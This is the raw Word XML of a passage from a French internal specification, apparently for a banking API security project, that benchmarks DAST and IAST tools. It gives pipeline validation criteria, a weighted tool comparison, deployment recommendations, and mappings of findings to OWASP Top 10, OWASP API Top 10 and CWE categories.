              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    DAST_TIMEOUT:      '20m'</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8.4   Critères de validation de l’intégration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Le pipeline se déclenche automatiquement sur push/MR sans intervention manuelle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Le rapport SARIF est publié en artifact et visible dans le GitLab Security Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Un pipeline sain (sans vuln CRITICAL) passe le gate sans blocage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Un pipeline avec une vuln CRITICAL injectée est bloqué (exit code != 0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Les credentials de scan ne sont pas exposés dans les logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">La coexistence SonarQube / Xray / DAST / IAST est validée (pas de conflit de stage)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">La traçabilité (timestamp, commit SHA, branch) est présente dans chaque rapport</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">L’overhead IAST mesuré est dans les seuils acceptés pour chaque langage testé</w:t>
      </w:r>
    </w:p>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9   Recommandations pour le Benchmark</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9.1   Matrice de sélection des outils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100"/>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="15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Pondération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OWASP ZAP</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StackHawk</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42Crunch</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Contrast Security</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Seeker (Synopsys)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Bright Security</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Couverture OWASP API Top10</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20%</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Complète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Complète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Complète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Complète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Complète</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Complète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IAST multi-langages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20%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9C1B1B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9C1B1B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9C1B1B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Non</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Java,.NET,Go</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Java,Python,Node</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="152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Java,Node,Python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Gestion FP persistante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15%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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Basique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Avancée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API-centric</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Avancée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Avancée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Avancée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Templates rapport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10%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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Basique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Configurables</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Configurables</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Configurables</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Configurables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Configurables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Intégration GitLab native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15%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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Via script</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Native</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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Via API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Native</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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Via script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Native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Token refresh mid-scan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10%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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Manuel</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Auto</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Auto</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Auto</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Auto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Auto</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Coût / Open Source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10%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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Gratuit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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Commercial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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Commercial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9C1B1B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Premium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9C1B1B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Premium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="152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Commercial</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9.2   Recommandations par scénario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Budget contraint / parc Java dominant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DAST : OWASP ZAP (Automation Framework) + StackHawk pour la gestion des FP avancée</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IAST : Contrast Security Community Edition (Java natif, gratuit jusqu’à un certain volume)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SCA + Reachability : SDepend (complément indispensable, angle mort de DAST et IAST)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Parc poly-langage (Java, Python, Node, .NET, Go)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DAST : Bright Security ou StackHawk (intégration GitLab native, gestion FP avancée)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IAST : Seeker (Synopsys) — meilleure couverture multi-langages du marché</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SCA + Reachability : SDepend pour les composants JVM, Snyk/Xray pour les autres langages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">APIs spécifiquement (REST, GraphQL, gRPC)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">42Crunch : spécialiste API, audit statique de la spec OpenAPI + scan dynamique. Très précis sur les vulnérabilités API-spécifiques (BOLA, BOPLA, mass assignment)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP ZAP avec le plugin API Scanner : gratuit, très configurable, baseline Git native</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9.3   Architecture cible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4426"/>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Couche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Outil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4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Ce qu’il détecte que les autres ne font pas</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SCA + Reachability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SDepend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BUILD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Vulnérabilités dans les dépendances tierces + confirmation que la méthode vulnérable est réellement appelée dans le code (angle mort DAST + IAST)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SonarQube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BUILD</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Vulnérabilités dans le code source (injection, hardcoded secrets, logic flaws) sans exécution</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IAST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Seeker / Contrast</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BUILD (test)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Vulnérabilités confirmées par exécution réelle, zéro FP structurel, tous langages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 CI/CD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StackHawk / ZAP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STAGING</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Surface d’attaque externe, misconfiguration, auth bypass, sans accès au code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 On-Demand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Bright / 42Crunch</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PROD (passif)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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APIs non documentées, shadow APIs, drift de configuration post-déploiement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single" w:color="1E6B3C" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E6B3C" w:sz="1"/>
              <w:right w:val="single" w:color="1E6B3C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D9EAD3"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Conclusion : DAST et IAST sont complémentaires, pas redondants. IAST détecte les vulnérabilités dans le code exécuté (BUILD). DAST détecte les problèmes de surface externe (RUN). SDepend/SCA détecte les risques dans les dépendances. Les trois couches ensemble, avec SonarQube pour le SAST, constituent une couverture sans angle mort.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="2E75B6" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Document à usage interne – Classification C2 Restreint – PSC26 – DEB_SécuAPI – Mai 2026</w:t>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10   Référentiels de Sécurité Supportés</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Un outil de benchmark DAST/IAST doit impérativement mapper ses findings sur les référentiels standards reconnus. Cette capacité conditionne l'exploitabilité des résultats par le VOC, le CSIRT et les équipes de développement, et garantit l'alignement avec les obligations DORA.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4F24" w:sz="1"/>
              <w:left w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:bottom w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:right w:val="single" w:color="7F4F24" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FCE5CD"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Exigence de mapping obligatoire : chaque finding doit référencer au minimum son identifiant CWE et sa catégorie OWASP correspondante. Un finding sans référentiel ne peut pas être priorisé de façon objective ni corrélé avec d'autres sources (NVD, VOC, Trivy, SDepend).</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10.1   OWASP Top 10 Web (2021)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Applicable aux applications web exposant des interfaces utilisateur ou des APIs hybrides (réponses HTML + JSON). Le DAST doit couvrir les 10 catégories.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426"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="180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Réf.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Catégorie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Applicable DAST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Applicable IAST</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A01:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Broken Access Control</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A02:2021</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Cryptographic Failures</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A03:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Injection (SQL, LDAP, OS, XXE)</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A04:2021</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Insecure Design</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A05:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Security Misconfiguration</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A06:2021</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Vulnerable &amp; Outdated Components</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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9C1B1B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SCA/SDepend</w:t>
            </w:r>
          </w:p>
        </w:tc>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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9C1B1B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SCA/SDepend</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A07:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Identification &amp; Auth Failures</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A08:2021</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Software &amp; Data Integrity Failures</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A09:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Security Logging &amp; Monitoring Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>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A10:2021</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Server-Side Request Forgery (SSRF)</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8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10.2   OWASP API Security Top 10 (2023)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Référentiel prioritaire pour le projet PSC26 — toutes les APIs du périmètre gLBP sont concernées. Couverture exhaustive obligatoire pour les deux modes DAST.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1400"/>
        <w:gridCol w:w="2226"/>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Réf.</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Catégorie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 CI/CD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 On-Demand</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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API1:2023</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Broken Object Level Authorization (BOLA/IDOR)</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22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API2:2023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Broken Authentication</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22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API3:2023</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Broken Object Property Level Auth (BOPLA)</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22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API4:2023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Unrestricted Resource Consumption (URC)</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222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API5:2023</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Broken Function Level Authorization (BFLA)</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22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API6:2023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Unrestricted Access to Sensitive Business Flows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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22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API7:2023</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Server Side Request Forgery (SSRF)</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22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API8:2023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Security Misconfiguration</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22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API9:2023</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Improper Inventory Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2226"/>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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9C1B1B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Non applicable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API10:2023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Unsafe Consumption of APIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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10.3   CWE (Common Weakness Enumeration)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Le CWE est la taxonomie technique de référence pour les vulnérabilités. Chaque finding DAST/IAST doit être mappé sur son CWE. Les CWE les plus critiques sur le périmètre API bancaire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426"/>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CWE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Intitulé</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Scénario associé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Outil primaire</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CWE-89</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SQL Injection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SC-01 — SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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 + IAST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CWE-79</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Cross-Site Scripting (XSS)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SC-02 — XSS</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 + IAST</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CWE-347</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Improper Verification of Cryptographic Signature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SC-03 — JWT sans/faible signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CWE-284 / CWE-639</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Improper Access Control / IDOR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SC-04 — IDOR/BOLA</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 + IAST</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CWE-502</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Deserialization of Untrusted Data</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SC-05 — Désérialisation DTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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IAST (primaire)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CWE-918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Server-Side Request Forgery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SC-06 — SSRF</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 + IAST</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CWE-312 / CWE-256</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Cleartext Storage / Exposed Credentials</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SC-07 — Hash mot de passe exposé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CWE-611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Improper Restriction of XML External Entity (XXE)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SC-08 — XXE</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 + IAST</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CWE-22</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Path Traversal</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Couverture générale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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IAST (primaire)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CWE-20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Improper Input Validation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Couverture générale</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 + IAST</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10.4   CVE — Périmètre et limites</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
